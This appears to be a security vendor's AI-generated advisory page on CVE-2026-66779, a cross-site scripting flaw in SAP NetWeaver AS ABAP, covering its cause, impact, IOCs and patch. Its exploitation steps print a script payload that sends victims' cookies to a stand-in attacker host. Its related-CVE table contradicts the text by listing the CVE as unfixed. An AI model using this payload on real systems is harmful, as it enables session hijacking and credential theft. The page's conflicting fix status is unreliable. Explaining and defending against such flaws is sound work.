CVE-2026-66779
SAP NetWeaver Application Server ABAP vulnerability analysis and mitigation

Overview

CVE-2026-66779 is a DOM-based/Reflected Cross-Site Scripting (XSS) vulnerability in SAP NetWeaver Application Server ABAP. An authenticated attacker can craft a malicious link that, when accessed by another authenticated victim, causes injected input to be processed and reflected within the DOM during page rendering, executing malicious content in the victim's browser. Affected component versions include SAP_UI 754, 755, 756, 757, 758, 816; EP-FLP 7.50; SAP_BASIS 731; and AJAX-RUNTIME 7.50. The vulnerability was published on August 11, 2026, and carries a CVSS v3.1 base score of 6.3 (Medium) (GitHub Advisory).

Technical details

The root cause is improper neutralization of user-controllable input before it is placed in output rendered as a web page (CWE-79). The attack vector is network-based and requires low privileges (an authenticated attacker account) and user interaction from an authenticated victim. The attacker crafts a malicious URL containing injected script content; when the victim navigates to this link, the application reflects the unsanitized input into the DOM on the client side, triggering execution of the attacker's JavaScript in the victim's browser context. The vulnerability is associated with CAPEC patterns including DOM-Based XSS (CAPEC-588) and Reflected XSS (CAPEC-591) (GitHub Advisory).

Impact

Successful exploitation results in high confidentiality impact and low integrity impact, with no effect on availability. An attacker can execute arbitrary JavaScript in the victim's browser context, enabling theft of session tokens, authentication credentials, or other sensitive data accessible to the victim. While the scope is unchanged (limited to the affected component), the ability to hijack authenticated sessions could facilitate unauthorized actions within the SAP NetWeaver environment on behalf of the victim (GitHub Advisory).

Exploitability

There is no evidence of public proof-of-concept exploit code or active in-the-wild exploitation at this time. The vulnerability is not automatable and requires both an authenticated attacker and user interaction from an authenticated victim, limiting its exploitability. The EPSS score is approximately 0.201%, indicating a low probability of exploitation within the next 30 days. The CVE is not currently listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (GitHub Advisory).

Exploitation steps

  1. Reconnaissance: Identify SAP NetWeaver Application Server ABAP instances running affected component versions (SAP_UI 754–758/816, EP-FLP 7.50, SAP_BASIS 731, AJAX-RUNTIME 7.50) accessible to the attacker.
  2. Authenticate: Log in to the SAP NetWeaver application with a low-privileged authenticated account.
  3. Craft malicious link: Identify a vulnerable endpoint that reflects user-supplied input into the DOM without proper sanitization, and construct a URL containing an injected JavaScript payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script> or equivalent encoded form).
  4. Distribute the link: Make the crafted URL publicly accessible or send it to a targeted authenticated victim via email, messaging, or other social engineering channels.
  5. Victim interaction: When the authenticated victim clicks the link and the page renders, the injected script executes in their browser context.
  6. Harvest data: The attacker's script exfiltrates session tokens, cookies, or other sensitive information to an attacker-controlled server, potentially enabling session hijacking or further unauthorized actions within the SAP environment (GitHub Advisory).

Indicators of compromise

  • Network: Outbound HTTP requests from victim browsers to unexpected external domains immediately after accessing SAP NetWeaver URLs; unusual GET/POST requests to SAP endpoints containing encoded script tags or JavaScript event handlers in URL parameters.
  • Logs: SAP NetWeaver access logs showing requests to vulnerable endpoints with URL-encoded XSS payloads (e.g., %3Cscript%3E, javascript:, onerror=, onload=) in query parameters or path segments.
  • Browser/Session: Unexpected session terminations or concurrent sessions for the same user account; authentication tokens appearing in external server logs not associated with legitimate SAP infrastructure.
  • Application Logs: Anomalous DOM manipulation errors or JavaScript exceptions logged in browser developer consoles on SAP Fiori/NetWeaver pages.

Mitigation and workarounds

SAP has released a patch addressing this vulnerability, referenced in SAP Security Note 3721424, available via the SAP Support Portal. Organizations should apply the relevant SAP Security Patch Day updates for August 2026 to affected component versions (SAP_UI 754–816, EP-FLP 7.50, SAP_BASIS 731, AJAX-RUNTIME 7.50). As interim mitigations, implement strict Content Security Policy (CSP) headers to restrict script execution, enforce input validation and output encoding for all user-supplied data, and educate users to avoid clicking on unsolicited or untrusted SAP application links (GitHub Advisory, SAP Patch Day).

Community reactions

SAP's August 2026 Security Patch Day was covered by SAP security specialists including Onapsis and SecurityBridge, who published blog posts summarizing the patched vulnerabilities. RedRays also published analysis of the August 2026 SAP patch day. CyberSecurityNews reported on the broader set of SAP vulnerabilities addressed in this patch cycle, including code injection and memory corruption issues alongside this XSS finding (Onapsis Blog, SecurityBridge Blog, RedRays Blog, CyberSecurityNews).

Additional resources


SourceThis report was generated using AI

Related SAP NetWeaver Application Server ABAP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-44747CRITICAL9.9
  • SAP NetWeaver Application Server ABAP logoSAP NetWeaver Application Server ABAP
  • cpe:2.3:a:sap:netweaver_application_server_abap
NoYesJul 14, 2026
CVE-2026-44748CRITICAL9.9
  • SAP NetWeaver Application Server ABAP logoSAP NetWeaver Application Server ABAP
  • cpe:2.3:a:sap:netweaver_application_server_abap
NoYesJun 09, 2026
CVE-2026-44751HIGH7.1
  • SAP NetWeaver Application Server ABAP logoSAP NetWeaver Application Server ABAP
  • cpe:2.3:a:sap:netweaver_application_server_abap
NoYesJun 09, 2026
CVE-2026-66779MEDIUM6.3
  • SAP NetWeaver Application Server ABAP logoSAP NetWeaver Application Server ABAP
  • cpe:2.3:a:sap:netweaver_application_server_abap
NoNoAug 11, 2026
CVE-2026-58236MEDIUM5.5
  • SAP NetWeaver Application Server ABAP logoSAP NetWeaver Application Server ABAP
  • cpe:2.3:a:sap:netweaver_application_server_abap
NoYesAug 11, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management